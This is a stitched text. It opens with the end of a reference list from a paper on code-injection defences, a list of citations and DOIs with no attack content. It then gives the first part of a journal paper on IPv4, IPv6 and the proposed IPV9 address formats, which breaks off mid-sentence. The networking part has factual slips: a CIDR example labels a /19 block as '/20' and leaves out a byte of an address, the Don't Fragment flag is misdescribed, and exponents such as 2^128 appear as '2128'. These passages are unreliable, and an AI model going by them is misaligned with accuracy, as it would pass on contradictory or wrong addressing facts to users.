D, Amarasinghe SP. 2002. Secure execution via program shepherding. In: Boneh D, ed. Proceedings of the 11th USENIX security symposium. Berkeley: USENIX Association, 191–206. Kong D, Zheng Q, Chen C, Shuai J, Zhu M. 2007. ISA: a source code static vulnerability detection system based on data fusion. In: Li J, Lee W-C, Silvestri F, eds. Proceedings of the 2nd international conference on scalable information systems, InfoScale’07. Brussels, Belgium: ICST (Institute for Computer Sciences, Social-Informatics and Telecommunications Engineering), 55:1–55:7. Kuznetsov V, Szekeres L, Payer M, Candea G, Sekar R, Song D. 2014. Code-pointer integrity. In: Flinn J, Levy H, eds. Proceedings of the 11th USENIX conference on op- erating systems design and implementation, OSDI’14. Berkeley: USENIX Association, 147–163. Laranjeiro N, Vieira M, Madeira H. 2009. Protecting database centric web services against SQL/XPath injection attacks. In: Bhowmick SS, Küng J, Wagner R, eds. Proceedings of the 20th international conference on database and expert systems applica- tions, DEXA’09. Berlin: Springer-Verlag, 271–278 DOI 10.1007/978-3-642-03573-9_22. Laranjeiro N, Vieira M, Madeira H. 2010. A Learning-based approach to secure web services from SQL/XPath injection attacks. In: Proceedings of the 2010 IEEE 16th Pacific rim international symposium on dependable computing, PRDC’10. Washington, D.C.: IEEE Computer Society, 191–198 DOI 10.1109/PRDC.2010.24. Lee SY, Low WL, Wong PY. 2002. Learning fingerprints for a database intrusion detection system. In: Gollmann D, Karjoth G, Waidner M, eds. Proceedings of the 7th European symposium on research in computer security, ESORICS’02. London, UK: Springer-Verlag, 264–280 DOI 10.1007/3-540-45853-0_16. Lhee K-S, Chapin SJ. 2003. Buffer overflow and format string overflow vulnerabilities. Software: practice and experience 33(5):423–460 DOI 10.1002/spe.515. Livshits VB, Lam MS. 2005. Finding security vulnerabilities in Java applications with static analysis. In: Proceedings of the 14th USENIX security symposium. Berkeley: USENIX Association, 18–18. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 33/40 https://peerj.com http://dx.doi.org/10.1145/997140.997147 http://dx.doi.org/10.1145/948109.948146 http://dx.doi.org/10.1109/MSP.2009.15 http://dx.doi.org/10.1145/360248.360252 http://dx.doi.org/10.1007/978-3-642-03573-9_22 http://dx.doi.org/10.1109/PRDC.2010.24 http://dx.doi.org/10.1007/3-540-45853-0_16 http://dx.doi.org/10.1002/spe.515 http://dx.doi.org/10.7717/peerj-cs.136 Louw MT, Venkatakrishnan VN. 2009. Blueprint: robust prevention of cross-site scripting attacks for existing browsers. In: Proceedings of the 2009 30th IEEE sympo- sium on security and privacy. Washington, D.C.: IEEE Computer Society, 331–346 DOI 10.1109/SP.2009.33. Martin M, Lam MS. 2008. Automatic generation of XSS and SQL injection attacks with goal-directed model checking. In: Van Oorschot P, ed. Proceedings of the 17th USENIX security symposium. Berkeley: USENIX Association, 31–43. Martin M, Livshits B, Lam MS. 2005. Finding application errors and security flaws using PQL: a program query language. In: Johnson R, ed. Proceedings of the 20th ACM conference on object oriented programming, systems, languages, and applications, OOPSLA’05. New York: ACM Press, 365–383 DOI 10.1145/1094811.1094840. Mashtizadeh AJ, Bittau A, Boneh D, Mazières D. 2015. CCFI: cryptographically enforced control flow integrity. In: Ray I, ed. Proceedings of the 22Nd ACM SIGSAC conference on computer and communications security, CCS’15. New York: ACM, 941–951 DOI 10.1145/2810103.2813676. Mattos T, Santin A, Malucelli A. 2013. Mitigating XML injection 0-day attacks through strategy-based detection systems. IEEE Security and Privacy 11(4):46–53 DOI 10.1109/MSP.2012.83. McClure RA, Krüger IH. 2005. SQL DOM: compile time checking of dynamic SQL statements. In: Roman G-C, ed. Proceedings of the 27th international conference on software engineering, ICSE’05. 88–96 DOI 10.1145/1062455.1062487. McGraw G. 2006. Software security: building security in. Boston: Addison-Wesley Professional. McGraw G. 2008. Automated code review tools for security. IEEE Computer 41(12):108–111 DOI 10.1109/MC.2008.514. McMillan KL. 1992. Symbolic model checking: an approach to the state explosion problem. PhD thesis, Carnegie Mellon University. Mellado D, Fernández-Medina E, Piattini M. 2010. Security requirements engineer- ing framework for software product lines. Information and Software Technology 52(10):1094–1117 DOI 10.1016/j.infsof.2010.05.007. Merz S. 2001. Model checking: a tutorial overview. In: Cassez F, Jard C, Rozoy B, Ryan MD, eds. Proceedings of the 4th summer school on modeling and verification of parallel processes. London: Springer-Verlag, 3–38 DOI 10.1007/3-540-45510-8_1. Miller A, Donaldson A, Calder M. 2006. Symmetry in temporal logic model checking. ACM Computing Surveys 38(3):432–441. Minamide Y. 2005. Static approximation of dynamically generated web pages. In: Ellis A, Hagino T, eds. Proceedings of the 14th international conference on World Wide Web, WWW’05. New York: ACM, 432–441 DOI 10.1145/1060745.1060809. Mitropoulos D, Karakoidas V, Louridas P, Spinellis D. 2011. Countering code injection attacks: a unified approach. Information Management and Computer Security 19(3):177–194 DOI 10.1108/09685221111153555. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 34/40 https://peerj.com http://dx.doi.org/10.1109/SP.2009.33 http://dx.doi.org/10.1145/1094811.1094840 http://dx.doi.org/10.1145/2810103.2813676 http://dx.doi.org/10.1109/MSP.2012.83 http://dx.doi.org/10.1145/1062455.1062487 http://dx.doi.org/10.1109/MC.2008.514 http://dx.doi.org/10.1016/j.infsof.2010.05.007 http://dx.doi.org/10.1007/3-540-45510-8_1 http://dx.doi.org/10.1145/1060745.1060809 http://dx.doi.org/10.1108/09685221111153555 http://dx.doi.org/10.7717/peerj-cs.136 Mitropoulos D, Karakoidas V, Spinellis D. 2009. Fortifying applications against XPath injection attacks. In: 4th mediterranean conference on information systems, MCIS 2009. 1169–1179. Mitropoulos D, Spinellis D. 2009. SDriver: location-specific signatures prevent SQL in- jection attacks. Computers and Security 28:121–129 DOI 10.1016/j.cose.2008.09.005. Mitropoulos D, Stroggylos K, Spinellis D, Keromytis AD. 2016. How to train your browser: preventing XSS attacks using contextual script fingerprints. ACM Trans- actions on Privacy and Security 19(1):2:1–2:31 DOI 10.1145/2939374. Moonen L. 1997. A generic architecture for data flow analysis to support reverse engineering. In: Proceedings of the 2nd international conference on theory and practice of algebraic specifications, Algebraic’97. Swinton: British Computer Society, 10–10. Nadji Y, Saxena P, Song D. 2006. Document structure integrity: a robust basis for cross-site scripting defense. In: Proceedings of the 22nd annual computer security applications conference, ACSAC’06. Washington, D.C.: IEEE Computer Society, 463–472. Nadji Y, Saxena P, Song D. 2009. Document structure integrity: a robust basis for cross- site scripting defense. In: Proceeding of the network and distributed system security symposium (NDSS). Nagy C, Mancoridis S. 2009. Static security analysis based on input-related software faults. In: Proceedings of the 2009 European conference on software maintenance and reengineering, CSMR ’09. Washington, D.C.: IEEE Computer Society, 37–46 DOI 10.1109/CSMR.2009.51. Nanda S, Lam L-C, Chiueh T-C. 2007. Dynamic multi-process information flow tracking for web application security. In: Proceedings of the 2007 interna- tional conference on middleware companion, MC’07. New York: ACM, 1–19 DOI 10.1145/1377943.1377956. Nguyen-Tuong A, Guarnieri S, Greene D, Shirley J, Evans D. 2006. Automatically hardening web applications using precise tainting. In: Sasaki R, Qing S, Okamoto E, Yoshiura H, eds. IFIP international information security conference. 295–308 DOI 10.1007/0-387-25660-1_20. Null LM, Wong J. 1992. The diamond security policy for object-oriented databases. In: Agrawal JP, Kumar J, Wallentine V, eds. Proceedings of the 1992 ACM annual confer- ence on communications, CSC’92. New York: ACM, 49–56 DOI 10.1145/131214.131221. Papagiannis I, Migliavacca M, Pietzuch P. 2011. PHP aspis: using partial taint tracking to protect against injection attacks. In: Fox A, ed. Proceedings of the 2nd USENIX conference on web application development, WebApps’11. Berkeley: USENIX Associa- tion, 2–2. Peck R, Devore J. 2010. Statistics: the exploration & analysis of data. Boston: Brooks/Cole, Cengage Learning. Pierce BC. 2002. Types and programming languages. Cambridge: MIT Press. Pincus J, Baker B. 2004. Beyond stack smashing: recent advances in exploiting buffer overruns. IEEE Security and Privacy 2(4):20–27 DOI 10.1109/MSP.2004.36. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 35/40 https://peerj.com http://dx.doi.org/10.1016/j.cose.2008.09.005 http://dx.doi.org/10.1145/2939374 http://dx.doi.org/10.1109/CSMR.2009.51 http://dx.doi.org/10.1145/1377943.1377956 http://dx.doi.org/10.1007/0-387-25660-1_20 http://dx.doi.org/10.1145/131214.131221 http://dx.doi.org/10.1109/MSP.2004.36 http://dx.doi.org/10.7717/peerj-cs.136 Pnueli A. 1977. The temporal logic of programs. In: Proceedings of the 18th annual symposium on foundations of computer science, SFCS ’77. Washington, D.C.: IEEE Computer Society, 46–57 DOI 10.1109/SFCS.1977.32. Qin F, Wang C, Li Z, Kim H-S, Zhou Y, Wu Y. 2006. LIFT: a low-overhead practical information flow tracking system for detecting security attacks. In: Proceedings of the 39th annual IEEE/ACM international symposium on microarchitecture, MICRO 39. Washington, D.C.: IEEE Computer Society, 135–148 DOI 10.1109/MICRO.2006.29. Ray D, Ligatti J. 2012. Defining code-injection attacks. In: Field J, ed. Proceedings of the 39th annual ACM symposium on principles of programming languages, POPL’12. New York: ACM, 179–190 DOI 10.1145/2103621.2103678. Reis C, Dunagan J, Wang HJ, Dubrovsky O, Esmeir S. 2006. BrowserShield: vulnerability-driven filtering of dynamic HTML. In: Bershad B, Mogul J, eds. Proceedings of the 7th symposium on operating systems design and implementation, OSDI’06. Berkeley, CA, USA: USENIX Association, 61–74. Reps T, Horwitz S, Sagiv M. 1995. Precise interprocedural dataflow analysis via graph reachability. In: Cytron RK, Lee P, eds. Proceedings of the 22nd ACM sympo- sium on principles of programming languages, POPL’95. New York: ACM, 49–61 DOI 10.1145/199448.199462. Richards G, Hammer C, Burg B, Vitek J. 2011. The eval that men do: a large-scale study of the use of eval in javascript applications. In: Mezini M, ed. Proceedings of the 25th European conference on object-oriented programming, ECOOP’11. Berlin: Springer- Verlag, 52–78 DOI 10.1007/978-3-642-22655-7_4. Romero-Mariona J, Ziv H, Richardson DJ, Bystritsky D. 2009. Towards usable cyber security requirements. In: Proceedings of the 5th annual workshop on cy- ber security and information intelligence research: cyber security and information intelligence challenges and strategies, CSIIRW’09. New York: ACM, 64:1–64:4 DOI 10.1145/1558607.1558681. Ruse M, Sarkar T, Basu S. 2010. Analysis & detection of SQL injection vulnerabilities via automatic test case generation of programs. In: Proceedings of the 2010 10th IEEE/IPSJ international symposium on applications and the internet, SAINT’10. Washington, D.C.: IEEE Computer Society, 31–37 DOI 10.1109/SAINT.2010.60. Saiedian H, Broyle D. 2011. Security vulnerabilities in the same-origin policy: implica- tions and alternatives. Computer 44(9):29–36 DOI 10.1109/MC.2011.226. Saxena P, Akhawe D, Hanna S, Mao F, McCamant S, Song D. 2010. A symbolic execution framework for JavaScript. In: Proceedings of the 2010 IEEE symposium on security and privacy. Washington, D.C.: IEEE Computer Society, 513–528 DOI 10.1109/SP.2010.38. Schwarz B, Chen H, Wagner D, Lin J, Tu W, Morrison G, West J. 2005. Model checking an entire linux distribution for security violations. In: Proceedings of the 21st annual computer security applications conference, ACSAC’05. Washington, D.C.: IEEE Computer Society, 13–22 DOI 10.1109/CSAC.2005.39. Seixas N, Fonseca J, Vieira M, Madeira H. 2009. Looking at web security vulnerabilities from the programming language perspective: a field study. In: Proceedings of the Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 36/40 https://peerj.com http://dx.doi.org/10.1109/SFCS.1977.32 http://dx.doi.org/10.1109/MICRO.2006.29 http://dx.doi.org/10.1145/2103621.2103678 http://dx.doi.org/10.1145/199448.199462 http://dx.doi.org/10.1007/978-3-642-22655-7_4 http://dx.doi.org/10.1145/1558607.1558681 http://dx.doi.org/10.1109/SAINT.2010.60 http://dx.doi.org/10.1109/MC.2011.226 http://dx.doi.org/10.1109/SP.2010.38 http://dx.doi.org/10.1109/CSAC.2005.39 http://dx.doi.org/10.7717/peerj-cs.136 2009 20th international symposium on software reliability engineering, ISSRE’09. Washington, D.C.: IEEE Computer Society, 129–135 DOI 10.1109/ISSRE.2009.30. Sekar R. 2009. An efficient black-box technique for defeating web application attacks. In: Proceeding of the network and distributed system security symposium (NDSS). Reston: Internet Society. Shacham H, Page M, Pfaff B, Goh E-J, Modadugu N, Boneh D. 2004. On the effective- ness of address-space randomization. In: Atluri V, ed. Proceedings of the 11th ACM conference on computer and communications security, CCS’04. New York: 298–307 DOI 10.1145/1030083.1030124. Shahriar H, Zulkernine M. 2012. Mitigating program security vulnerabilities: approaches and challenges. ACM Computing Surveys 44(3):11:1–11:46 DOI 10.1145/2187671.2187673. Sivakumar K, Garg K. 2007. Constructing a ‘‘Common cross site scripting vulnerabil- ities enumeration (CSE)’’ using CWE and CVE. In: McDaniel P, Gupta SK, eds. Proceedings of the 3rd international conference on information systems security. Berlin: Springer-Verlag, 277–291 DOI 10.1007/978-3-540-77086-2_25. Son S, McKinley KS, Shmatikov V. 2013. Diglossia: detecting code injection attacks with precision and efficiency. In: Sadeghi A-R, ed. Proceedings of the 2013 ACM conference on computer and communications security, CCS’13. New York: ACM, 1181–1192 DOI 10.1145/2508859.2516696. Son SH, Chaney C, Thomlinson NP. 1998. Partial security policies to support timeliness in secure real-time databases. In: Proceedings of the IEEE symposium on security and privacy. Charlottesville: IEEE DOI 10.1109/SECPRI.1998.674830. Soni P, Budianto E, Saxena P. 2015. The SICILIAN defense: signature-based whitelist- ing of web JavaScript. In: Ray I, ed. Proceedings of the 22nd ACM conference on computer and communications security, CCS’15. New York: ACM, 1542–1557 DOI 10.1145/2810103.2813710. Sovarel AN, Evans D, Paul N. 2005. Where’s the FEEB? the effectiveness of instruction set randomization. In: Proceedings of the 14th USENIX security symposium. Berkeley: USENIX Association, 10–10. Spacco J, Hovemeyer D, Pugh W. 2006. Tracking defect warnings across versions. In: Diehl S, Gall H, Hassan AE, eds. Proceedings of the 2006 international workshop on mining software repositories, MSR’06. New York: ACM, 133–136 DOI 10.1145/1137983.1138014. Stamm S, Sterne B, Markham G. 2010. Reining in the web with content security policy. In: Rappa M, Jones P, eds. Proceedings of the 19th international conference on world wide web, WWW’10. New York: ACM, 921–930 DOI 10.1145/1772690.1772784. Stefan D, Yang EZ, Marchenko P, Russo A, Herman D, Karp B, Mazières D. 2014. Protecting users by confining JavaScript with COWL. In: Proceedings of the 11th USENIX conference on operating systems design and implementation, OSDI’14. Berkeley: USENIX Association, 131–146. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 37/40 https://peerj.com http://dx.doi.org/10.1109/ISSRE.2009.30 http://dx.doi.org/10.1145/1030083.1030124 http://dx.doi.org/10.1145/2187671.2187673 http://dx.doi.org/10.1007/978-3-540-77086-2_25 http://dx.doi.org/10.1145/2508859.2516696 http://dx.doi.org/10.1109/SECPRI.1998.674830 http://dx.doi.org/10.1145/2810103.2813710 http://dx.doi.org/10.1145/1137983.1138014 http://dx.doi.org/10.1145/1772690.1772784 http://dx.doi.org/10.7717/peerj-cs.136 Stock B, Lekies S, Mueller T, Spiegel P, Johns M. 2014. Precise Client-side protection against Dom-based cross-site scripting. In: Proceedings of the 23rd USENIX security symposium. 655–670. Su Z, Wassermann G. 2006. The essence of command injection attacks in web ap- plications. In: Morrisett G, ed. Conference record of the 33rd ACM symposium on principles of programming languages, POPL’06. New York: ACM, 372–382 DOI 10.1145/1111037.1111070. Szekeres L, Payer M, Wei T, Song D. 2013. SoK: eternal war in memory. In: Sommer R, ed. Proceedings of the 2013 IEEE symposium on security and privacy. 48–62 DOI 10.1109/SP.2013.13. Takesue M. 2008. A protection scheme against the attacks deployed by hiding the violation of the same origin policy. In: Proceedings of the 2008 second international conference on emerging security information, systems and technologies. Washington, D.C.: IEEE Computer Society, 133–138 DOI 10.1109/SECURWARE.2008.24. Thuraisingham B, Ford W. 1995. Security constraint processing in a multilevel secure distributed database management system. IEEE Transactions on Knowledge and Data Engineering 7(2):274–293 DOI 10.1109/69.382297. Trinh M-T, Chu D-H, Jaffar J. 2014. S3: a symbolic string solver for vulnerability detec- tion in web applications. In: Ahn G-J, ed. Proceedings of the 2014 ACM conference on computer and communications security, CCS’14. New York: ACM, 1232–1243 DOI 10.1145/2660267.2660372. Tsitovich A. 2008. Detection of security vulnerabilities using guided model checking. In: Garcia de la Banda M, Pontelli E, eds. Proceedings of the 24th international conference on logic programming, ICLP’08. Berlin: Springer-Verlag, 822–823 DOI 10.1007/978-3-540-89982-2_90. Valeur F, Mutz D, Vigna G. 2005. A Learning-based Approach to the Detection of SQL Attacks. In: Julisch K, Kruegel C, eds. Proceedings of the second international conference on detection of intrusions and malware, and vulnerability assessment, DIMVA’05. Berlin: Springer-Verlag, 123–140 DOI 10.1007/11506881_8. Van der Veen V, Andriesse D, Göktaş E, Gras B, Sambuc L, Slowinska A, Bos H, Giuffrida C. 2015. Practical context-sensitive CFI. In: Ray I, ed. Proceedings of the 22nd ACM conference on computer and communications security, CCS’15. New York: ACM, 927–940 DOI 10.1145/2810103.2813673. Viega J, Bloch JT, Kohno T, McGraw G. 2002. Token-based scanning of source code for security problems. ACM Transactions on Information and System Security 5(3):238–261 DOI 10.1145/545186.545188. Viega J, Bloch JT, Kohno Y, McGraw G. 2000. ITS4: a static vulnerability scanner for C and C++ code. In: Proceedings of the 16th annual computer security applications conference, ACSAC’00. Washington, D.C.: IEEE Computer Society, 257. Viega J, McGraw G. 2001. Building secure software: how to avoid security problems the right way. Boston: Addison-Wesley. Vogt P, Nentwich F, Jovanovic N, Kirda E, Kruegel C, Vigna G. 2007. Cross-site scripting prevention with dynamic data tainting and static analysis. In: Proceeding Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 38/40 https://peerj.com http://dx.doi.org/10.1145/1111037.1111070 http://dx.doi.org/10.1109/SP.2013.13 http://dx.doi.org/10.1109/SECURWARE.2008.24 http://dx.doi.org/10.1109/69.382297 http://dx.doi.org/10.1145/2660267.2660372 http://dx.doi.org/10.1007/978-3-540-89982-2_90 http://dx.doi.org/10.1007/11506881_8 http://dx.doi.org/10.1145/2810103.2813673 http://dx.doi.org/10.1145/545186.545188 http://dx.doi.org/10.7717/peerj-cs.136 of the network and distributed system security symposium (NDSS). Reston: Internet Society. Von Oheimb D. 2004. Information flow control revisited: noninfluence=noninterfer- ence +nonleakage. In: Samarati P, Ryan P, Gollmann D, Molva R, eds. Proceedings of the 9th European symposium on research in computer security, ESORICS’04. Springer, 225–243 DOI 10.1007/978-3-540-30108-0_14. Wagner D, Foster JS, Brewer EA, Aiken A. 2000. A first step towards automated detec- tion of buffer overrun vulnerabilities. In: Proceeding of the network and distributed system security symposium (NDSS). Reston: Internet Society, 3–17. Wang H. 2010. Attacks target Web server logic and prey on XCS weaknesses: technical persepctive. Communications of the ACM 53(8):104–104 DOI 10.1145/1787234.1787256. Wang X, Pan C-C, Liu P, Zhu S. 2010. SigFree: a signature-free buffer overflow attack blocker. IEEE Transactions on Dependable and Secure Computing 7(1):65–79 DOI 10.1109/TDSC.2008.30. Wassermann G, Su Z. 2004. An analysis framework for security in web applications. In: Taylor RN, ed. SAVCBS 2004: proceedings of the FSE workshop on specification and verification of component-based systems SAVCBS, 70–78. Wassermann G, Su Z. 2007. Sound and precise analysis of web applications for injection vulnerabilities. In: Ferrante J, ed. PLDI ’07: proceedings of the 2007 ACM SIGPLAN conference on programming language design and implementation. New York: ACM Press, 32–41 DOI 10.1145/1273442.1250739. Wilander J, Kamkar M. 2002. A comparison of publicly available tools for static intrusion prevention. In: Proceedings of the 7th nordic workshop on secure IT systems. Karlstad, Sweden: Karlstad University, 68–84. Winsor J. 2000. Solaris system administrator’s guide. Third Edition. Upper Saddle River: Prentice Hall PTR. Wurster G, Van Oorschot PC. 2008. The developer is the enemy. In: Bishop M, Probst CW, eds. NSPW’08: proceedings of the 2008 workshop on new security paradigms. New York: ACM, 89–97 DOI 10.1145/1595676.1595691. Wurzinger P, Platzer C, Ludl C, Kirda E, Kruegel C. 2009. SWAP: mitigating XSS attacks using a reverse proxy. Washington, D.C.: IEEE Computer Society, 33–39. Xie Y, Aiken A. 2006. Static detection of security vulnerabilities in scripting languages. In: Proceedings of the 15th conference on USENIX security symposium—Volume 15, USENIX-SS’06. Berkeley: USENIX Association. Xu W, Bhatkar S, Sekar R. 2006. Taint-enhanced policy enforcement: a practical approach to defeat a wide range of attacks. In: Security’06: proceedings of the 15th USENIX security symposium. Berkeley: USENIX Association, 121–136. Younan Y, Joosen W, Piessens F. 2012. Runtime countermeasures for code injection attacks against C and C++ programs. ACM Computing Surveys 44(3):17:1–17:28 DOI 10.1145/2187671.2187679. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 39/40 https://peerj.com http://dx.doi.org/10.1007/978-3-540-30108-0_14 http://dx.doi.org/10.1145/1787234.1787256 http://dx.doi.org/10.1109/TDSC.2008.30 http://dx.doi.org/10.1145/1273442.1250739 http://dx.doi.org/10.1145/1595676.1595691 http://dx.doi.org/10.1145/2187671.2187679 http://dx.doi.org/10.7717/peerj-cs.136 Yu D, Chander A, Islam N, Serikov I. 2007. JavaScript instrumentation for browser security. In: Hofmann M, ed. Proceedings of the 34th ACM symposium on principles of programming languages. New York: ACM, 237–249 DOI 10.1145/1190215.1190252. Zitser M, Group DES, Leek T. 2004. Testing static analysis tools using exploitable buffer overflows from open source code. SIGSOFT Software Engineering Notes 29(6):97–106 DOI 10.1145/1041685.1029911. Zitser M, Lippmann R, Leek T. 2004. Testing static analysis tools using exploitable buffer overflows from open source code. SIGSOFT Software Engineering Notes 29(6):97–106 DOI 10.1145/1041685.1029911. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 40/40 https://peerj.com http://dx.doi.org/10.1145/1190215.1190252 http://dx.doi.org/10.1145/1041685.1029911 http://dx.doi.org/10.1145/1041685.1029911 http://dx.doi.org/10.7717/peerj-cs.136

work_23qh3ethwvhxtazlivq7izfvwa ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 48 Research on IPv4, IPv6 and IPV9 Address Representation YURY Halavachou Department of the International Relations Belarusian State University of Transport Republic of Belarus 34, Kirova street, Gomel, 246653 Republic of Belarus e-mail: oms@bsut.by Wang Yubian Department of Railway Transportation Control Belarusian State University of Transport 34, Kirova street, Gomel, 246653 Republic of Belarus e-mail: alika_wang@mail.ru Abstract—The new generation network architecture (IPV9) is designed to solve a series of problems such as the shortage of address space and the danger of information security. IPv4 addresses have a length of 32 bits and a theoretically expressible address space of 232, while IPv6 addresses extend to 128 bits and theoretically an address space of 2128. In this paper, by studying IPv4, IPv6 address structure focuses on the new generation of network IPV9 address representation method. This method adopts the address coding method of the variable-length and variable-position, ranging from 16 bits to 2048 bits. Moreover, it adopts the mechanism of verification before communication, and relies on the method of assigning addresses to the computers on the Internet with full character codes. It redefines the address structure of the future Internet and provides new solutions for the Internet of things and the Internet of everything. Keywords-IPv4; IPv6; IPV9; Address Structure I. NETWORK ADDRESS An interconnected network is made up of LAN with interconnected nodes, also known as hosts or routers. Each device has a physical address connected to a network with a MAC layer address and a logical Internet address. Because a network address can be logically assigned to any network device, it is also called a logical address. Internet addresses are assigned by the Internet Corporation for Assigned Names and Numbers. The association appoints three local organizations - INTERNIC, RIPENCC and APNIC - to carry out location assignments in North America, Europe and the Asia Pacific region. The purpose of this uniform allocation is to ensure that network addresses are globally unique. II. ADDRESS SPACE FOR IPV4 The entire Internet is a single and abstract network. An IP address is a worldwide unique 32-bit identifier assigned to each interface of every host (or router) on the Internet. The structure of IP addresses makes it easy to address them on the Internet. A. The base header of IPv4 The base first format design of IPv4 is shown in Figure 1. DOI: 10.21307/ijanmc-2019-047 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 49 Figure 1. IP datagram format Figure 1 shows. The first line of the above section indicates the bits occupied by each field in the header format. The whole header format is divided into fixed part (20 bytes in total) and variable part. The variable part is to increase the function of IP datagram, but the variable header length of IP datagram also increases the overhead of each router to process datagram. The following explains the role of the fields in the base IPv4 header. 1) Version. IP Version. 2) Header Length (HL). It can represent a maximum decimal value of 15 and the most commonly used header length of 20 bytes (header length of 0101). 3) Differentiated services. It is used to get better service. 4) Total Length. It refers to the length of the sum of the radical and the data. 5) Identification. It holds the value of the counter that accumulates the number of datagram. 6) Flag. It is a total of 3 bits, the lowest bit (More Fragment) means if there is still fragmentation, the middle bit (Don't Fragment) means if there is still fragmentation. 7) Fragment Offset. It represents the relative position of a slice in the original grouping after the longer grouping is fragmented. 8) Time To Live. It represents the lifetime of the datagram in the network. 9) Protocol. It indicates which protocol is used for the data carried by the datagram. 10) Head Checksum. As the datagram passes through each router, the router calculates the sum again. B. Classified IP addresses Classification of IP address is the most base addressing method, the core of which is to divide the IP address into several fixed classes, each of which is composed of two fixed-length fields: network-id and host-id. The first field indicates the network to which the host or router is connected, and the network number must be unique. The second field identifies the host or router, and a host number must be unique within the range indicated by the network number it is on. Thus, the uniqueness of an IP address is ensured. This two-level IP address can be recorded as: IP address: : ={< network number >, < host number >}, where ": : =" means "defined as". Figure 2 below shows the network number field and host number field of various IP addresses: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 50 Figure 2. Network number field and host number field in IP address Figure 2 shows: The network number field of address of class A, B and C (the field is pink in the figure) is 1, 2 and 3 word length respectively, while the category bit of 1-3 bits in the front of the network number field is specified as 0, 10 and 110 respectively. The host number fields of class A, B, and C addresses are 3, 2, and 1 word long, respectively. Class D addresses (the first four bits are 1110) are used for multicast (one-to-many communication). Class E addresses (the first four bits are 1111) are reserved for later use. A dotted decimal notation is presented to improve the readability of IP addresses when it is 32-bit binary code. In IP addresses, every eight bits is represented in decimal, with a dot inserted between the digits. Figure 3 illustrates the convenience of this method. Figure 3. Illustrates the decimal system C. Improvement of base addressing method Because the classified IP address has defects, the IP address addressing method also goes through the following two historical stages. 1) Subnet partitioning Subnet division mainly includes two contents, one is to make the IP address from two to three levels, improve the utilization of IP address space, improve International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 51 network performance and enhance the flexibility of IP address; The second is the use of subnet mask, subnet mask AND IP address bitwise "AND" operation (AND) to get the network address, so as to facilitate the datagram sent to the destination network. a) Subnet idea  The subnet is still represented as a network.  Borrow some bits from the host number of the network as the subnet number, and the two-level IP address becomes the three-level IP address within a certain range, which can be expressed as: IP address: : ={< network number >,< subnet number >,< host number >}  The IP datagram can be sent to the router according to the destination network number, and then the router can find the destination subnet according to the network number and subnet number, and deliver the IP datagram to the destination host. b) Subnet mask A subnet mask, also known as a network mask or address mask, is a 32-bit address that consists of a string of one’s followed by a string of zeros. It is used to indicate which bits are the subnet and host that identify an IP address. The following example illustrates the role of subnet masks: [Example] the known IP address is 132.32.63.23, and the subnet mask is 255.255.224.0.Try to find the network address. [Answer]The subnet mask is 11111111 11111111 11100000 00000000, because the first two bytes of the mask are all 1, so the first two bytes of the network address can be written as 132.32.The fourth byte of the subnet mask is all 0, so the fourth byte of the network address is 0.It can be seen that this question only needs to calculate the third byte in the address, and we can easily obtain the network address by using binary representation of the third byte of IP address and subnet mask, as shown in figure 4 below: Figure 4. Solving process of network address 2) Classless Inter-Domain Routing (constitute super-netting) The main characteristics of Classless Inter-Domain Routing (CIDR) are as follows: a) CIDR eliminates the traditional concept of classified address and subnet division. CIDR divides the IP address into a network-prefix and a host number, denoted by: IP address: : ={< network prefix >, < host number >} CIDR also uses slash notation. It is to add "/" after the IP address, and write the number of network prefix after the slash, for example: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 52 128.85.36.17/19 = 10000000, 01010101, 00100100, 00010001 b) CIDR address block CIDR combines the same network prefix with consecutive IP addresses to form a "CIDR address block", which can be specified by the smallest address in the address block and the number of digits in the network prefix. For example: 128.85.36.17/19 in the address block: The minimum address is 128.85.32.0/19=10000000 01010101 00100000 00000000 The maximum address is 128.85.63.255/19=10000000 01010101 00111111 So the above address can be recorded as 128.85.32.0/20, referred to as "/20 address block" for short. The routing table can use a CIDR address block containing multiple addresses to query the destination network. This aggregation of addresses is known as routing aggregation and is also known as composition supernettingting. III. IPV6 ADDRESS SPACE IPv6 is the sixth version of the Internet protocol. IPv6 USES 128-bit addresses (2128 bits), which is about 3.4 x 1038 addresses, but IPv6 addresses up to 128 bits in length does not say how many addresses there are per square meter of the earth. Rather, IPv6 addresses were designed to be large in size, with the aim of further subdividing them into layered routing domains that reflect the topology of the modern Internet. Using a 128-bit address space provides multiple levels of hierarchy and flexibility in designing hierarchical addressing and routing, which is lacking in the current ipv4-based Internet. IPv6 addresses consist of global routing prefixes, subnet ids, and interface ids. Where the global routing prefix is used to specify a site, the subnet ID is used to specify a link within the site, and the interface ID is used to specify an interface on the link. A. Base IPv6 headers IPv6 datagram with multiple optional extension headers is shown in figure 5, and IPv6 base headers are shown in figure 6. Figure 5. IPv6 datagram with multiple optional extension headers Figure 6. Basic IPv6 header with a length of 40 bytes International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 53 As shown in figure 6, the first line of the figure indicates the bit occupied by each field in the header format. Compared to IPv4, IPv6 fixed the base header with 40 bytes, eliminated many unnecessary fields, and reduced the number of private segments in the header to 8 (although the header length was doubled). The following explains the function of each field in the IPv6 basic header: 1) Version. It specifies the version of the protocol. 2) Traffic Class. It distinguishes between different IPv6 datagram categories or priorities. 3) Flow Label. It is a new mechanism for IPv6 to support pre-allocation of resources. 4) Payload Length. It specifies the number of bytes in an IPv6 datagram other than the base header. 5) Next Head. It is equivalent to the IPv4 protocol field or optional field. 6) Hop Limit. It is used to prevent datagram from being in the network indefinitely. B. IPv6 address representation method 1) Colon hexadecimal form Preferred form “n:n:n:n:n:n:n:n”.Each n 